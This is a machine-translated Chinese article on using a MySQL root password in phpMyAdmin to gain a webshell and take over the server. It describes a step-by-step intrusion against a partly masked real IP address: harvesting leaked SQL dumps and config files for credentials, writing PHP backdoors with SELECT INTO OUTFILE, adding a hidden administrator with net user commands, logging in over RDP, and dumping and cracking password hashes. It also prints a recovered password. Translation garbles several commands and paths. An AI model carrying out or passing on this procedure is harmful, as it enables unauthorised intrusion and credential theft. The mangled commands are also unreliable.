Shulou(Shulou.com)06/03 Report--

This article mainly introduces how PhpMyadmin uses the Mysql root password to obtain webshell, the content of the article is carefully selected and edited by the author, with a certain pertinence, and is of great significance to everyone's reference, the following is to understand with the author how PhpMyadmin uses the Mysql root password to obtain webshell.

Simeon

Phpmyadmin is a famous mysql online management system, which operates on the managed database by providing mysql database user accounts and passwords. In the process of *, once the mysql account and the corresponding password are obtained, the database managed by the account can be obtained easily, and the webshell permission and system permission can be obtained in conjunction with other vulnerabilities. Root account and password can be obtained by means of violent cracking and source code leakage. This paper mainly discusses the acquisition of root account, the use of phpmyadmin and how to derive webshell.

The main ways to use Mysql root account and password in phpmyadmin are as follows:

(1) get the contents of sensitive tables in all databases. For example, tables involving system configuration, various administrator tables managed by CMS, and tables for user accounts. Obtain administrator account and password and various configuration information through these tables.

(2) get the real physical path of the website. The real physical path of the website is mainly used to export webshell, which mainly includes program error report, phpinfo function, program configuration table and so on.

(3) directly import a sentence back door into the website directory or the directory where phpmyadmin is located through the query statement.

(4) after obtaining the webshell, if it is a windows system, you can try to raise the rights.

(5) some websites may have been hacked earlier, and they may have webshell, especially a back door. If there is a backdoor, it can be obtained through a backdoor brute force.

(6) if the real path of the website cannot be obtained, it means that a sentence webshell cannot be directly exported. You can log in to the system through the CMS system management account and look for loopholes to break through. For example, dedecms can obtain webshell by cracking the administrator account and uploading files directly.

(7) if the target is more than one website, the adjacent or known target system can be used by analyzing the password information obtained, such as scanning SSH password, Mysql password and so on.

(8) many websites that provide phpmyadmin often have vulnerabilities such as directory leakage and code leakage. The leaked code is used to obtain the database password, and the audit leaked code to obtain the loophole and exploit it.

(9) some versions of phpmyadmin have vulnerabilities such as remote execution and inclusion, through which webshell can be obtained directly.

The following is an example of practical use.

1. Perform a full port scan of the port on which the IP is located

Enter the IP address in Nmap and select "Intense scan,all Tcp port". The scan results show that the IP has opened ports 135,135,3306, 3389, 80 and so on. The detailed port opening is shown in figure 1. In the actual * * process, you can access each port one by one in the browser. Of course, some of the more obvious ports do not need to be tested. Some CVMs sometimes open multiple ports in order to provide multiple services. The more ports you have, the more vulnerabilities you can exploit.

Figure 1 Port opening

two。 Reverse check the domain name of the IP address

Query the IP in the domain name reverse search website, as shown in figure 2, which shows that there are three websites for the IP.

Fig. 2 Domain name reverse check

3. Visit the website IP

Enter the IP directly in the browser to access, and send out the existence of phpmyadmin directory, source code, database backup files and so on under the IP, as shown in figure 3. List of downloadable files:

Http://182.xx.xxx.16/mxsy_newzs.sql

Http://182.xx.xxx.16/szcmsw.sql

Http://182.xx.xxx.16/szcmsw11.sql

Http://182.xx.xxx.16/hs.zip

Http://182.xx.xxx.16/Z-BlogPHP_1_4_Deeplue_150101.zip

Figure 3 there are vulnerabilities such as directory disclosure in the IP where the CVM resides.

4. Get database password

Download the compressed file and database file leaked by the website respectively, decompress the compressed file after downloading the file, and then look for the database configuration file. After unzipping hs.zip, the database configuration is obtained in the common.inc.php file in its data directory, as shown in figure 4, but it is clear that the password is not the real database password, but should be the source code package of some cms. Continue to access each leaked directory and find that the rar file is still stored in the szcms1 directory, and http://182.xx.xxx.16/szcms1/szcms.rar and http://182.xx.xxx.16/szcms1/szcms1.rar are shown in figure 5. Download it and extract it, and successfully find the database configuration file.

Figure 4 getting the contents of the database configuration file

Figure 5 once again found the leaked source code compression file

5. Log in to phpmyadmin

Log in using the root account password obtained in the previous szcms1.rar, as shown in figure 6, and you can see that there are seven useful databases in the mysql database. You can select the database, and then select "Export" to export the specified database locally (the legendary * *, try not to do it! ).

Figure 6 Log in to phpmyadmin

6. Export a sentence from the back door to the CVM

At present, there are several ways to derive the back door of a sentence:

(1) create a table

CREATE TABLE `mysql`.`roommoon` (`roommoon1` TEXT NOTNULL)

INSERT INTO `mysql`.`roommoon` (`roommoon1`) VALUES ('')

SELECT `roommoon1` FROM `roommoon` INTO OUTFILE'd:/www/exehack.php'

DROP TABLE IF EXISTS `roommoon`

The above code creates the darkmoon table in the mysql database, then adds a field named darkmoon1, inserts a sentence code in the darkmoon1 field, then derives a sentence from the darkmoon1 field to the real path to the website "C:/WWW/szcms1/szcms/Public/", and finally deletes the darkmoon table.

Note: when using the above code, you must select the mysql database, select SQL in phpMyAdmin, and then execute the above code. What needs to be modified is the real path to the website and the file name "C:/WWW/szcms1/szcms/Public/ exehack.php"

(2) directly export a sentence backdoor file

Select''INTO OUTFILE' d bank bank www. CPP.

A result similar to "your SQL statement ran successfully (the query took 0.0006 seconds)" indicates that the backdoor file was generated successfully.

(3) shell that directly executes command permissions

Select''INTOOUTFILE' dVuGUGAN www _ server _ cmd.php'

After the export of this method is successful, you can directly execute the DOS command, using the method: www.xxx.com/cmd.php?cmd= (the dos command is directly executed after cmd=).

In this example, after executing the export script statement, the website hung up and could not access the CVM, which is quite depressing. Try to create a new connection through the mysql database client connection tool "Navicat for MySQL". Enter all the ip address and other information into the "Navicat for MySQL", and connect successfully, as shown in figure 7. Good luck!

Figure 7 using Navicat forMySQL to connect to the mysql database

Get the real physical path to the website C:\ WWW\ szcms1\ szcms\ Tp\ by visiting http://182.xx.xxx.16/szcms1/szcms/Public/Home/p_w_picpaths/micro_r4_c2.png, as shown in figure 8.

Figure 8 get the real path

Then execute in the mysql database:

CREATE TABLE`mysql`.`roommoon` (`roommoon1` TEXT NOT NULL)

INSERT Into`mysql`.`roommoon` (`roommoon1`) VALUES ('')

Select `instant moon1` FROM `roommoon` INTO OUTFILE 'CWWscarszcms1andszcms1andszcmsxehack.php'

DROP TABLE IFEXISTS `roommoon`

The exported webshell is tested on the website, as shown in figure 9. If no error is shown, it can be run. Add this address to the backdoor management of the Chinese kitchen knife to obtain the webshell directly, as shown in figure 10.

Figure 9 check whether the file is exported successfully through the directory disclosure vulnerability

Figure 10 get webshell

9. Increase the rights of CVM

(1) failed to obtain the plaintext password directly by wce

Through the Chinese kitchen knife team remote terminal command, directly execute the command, execute the whoami command displayed as system permissions, upload wce64.exe and execute "wce64-w" to get the current login plaintext password, as shown in figure 11, the result failed to obtain the password, directly obtain the plaintext password failed.

Figure 11 execute the command

(2) add administrators directly

The previous port scan shows that port 3389 of the CVM is open. Since webshell can execute the command, directly execute the commands "netuser temp temp2005 / add" and "net localgroup administrators temp / add" to add an administrator user temp with a password of temp2005. The temp user is successfully added to the administrator group as shown in figure 12.

Figure 12 adding temp users to the administrators group

(3) log in to 3389

Open mstsc.exe locally and enter the user name and password to log in. Log in to the CVM as shown in figure 13.

Figure 13 successfully log in to the CVM

(4) obtain administrator password hash and plaintext

After logging in to the cloud server, download a saminside program through the browser, as shown in figure 14, and get the hash value of the system directly. Export the hash value locally and crack it through the ophcrack program.

Figure 14 get the system hash value

Then upload a modified version of wce64 again without one click to get the password, as shown in figure 15, successfully obtain the password of adminstrator "123321abc*".

Figure 15 get the system administrator password

After reading the above about how PhpMyadmin uses Mysql root password to obtain webshell, many readers must have some understanding. If you need to get more industry knowledge and information, you can continue to follow our industry information column.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.